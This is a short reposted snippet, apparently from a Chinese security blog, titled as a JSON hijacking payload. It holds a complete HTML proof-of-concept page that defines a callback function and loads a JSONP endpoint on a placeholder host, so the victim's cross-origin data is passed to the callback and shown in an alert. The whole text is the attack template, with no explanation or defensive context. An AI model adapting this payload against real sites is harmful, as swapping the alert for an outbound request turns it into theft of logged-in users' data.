json劫持payload

<html>
<head>jsonp hijacking</head>
<body>
<script>
    function jj(json){
        alert(JSON.stringify(json));
    }
</script>
<script src="https://test/?callback=jj">
</script>
</body>
</html>
原文地址:https://www.cnblogs.com/huim/p/10601441.html